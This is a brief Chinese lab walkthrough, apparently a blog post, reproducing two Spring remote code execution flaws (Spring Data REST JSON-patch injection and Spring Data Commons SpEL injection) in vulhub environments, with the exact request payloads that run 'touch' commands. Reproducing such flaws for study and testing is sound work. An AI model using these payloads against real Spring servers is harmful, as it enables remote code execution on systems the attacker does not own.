常见框架漏洞—Spring

一.Spring Data Rest 远程命令执⾏命令

1.搭建环境

2.访问网站下的/customers/1

3.对当前页面进行抓包,修改提交方式为PATCH,内容类型为application/json-patch+json

{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }

4.发现容器目录中有了succese

二.Spring代码执行

1.环境搭建

2.访问网站下的users目录

3.提交页面进行抓包,添加poc:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t
ouch /tmp/crz")]=&password=&repeatedPassword=

4.查看终端,发现成功写入

相关推荐
爬山算法几秒前
Redis(84)如何解决Redis的缓存击穿问题?
java·redis·缓存
程序定小飞3 分钟前
基于springboot的电影评论网站系统设计与实现
java·spring boot·后端
l1t19 分钟前
利用DuckDB SQL求解集合数学题
数据库·sql·算法·集合·duckdb
筵陌29 分钟前
MYSQL表的操作
数据库·mysql·1024程序员节
一 乐36 分钟前
汽车销售|汽车推荐|基于SprinBoot+vue的新能源汽车个性化推荐系统(源码+数据库+文档)
java·数据库·vue.js·汽车·毕设·汽车个性化推荐
虾说羊42 分钟前
最细Maven教程以及Maven私服搭建
java·数据库·maven
杯莫停丶1 小时前
设计模式之:装饰器模式
java·设计模式·装饰器模式
RestCloud1 小时前
Kingbase与ETL:如何实现金融级数据库的安全数据同步
数据库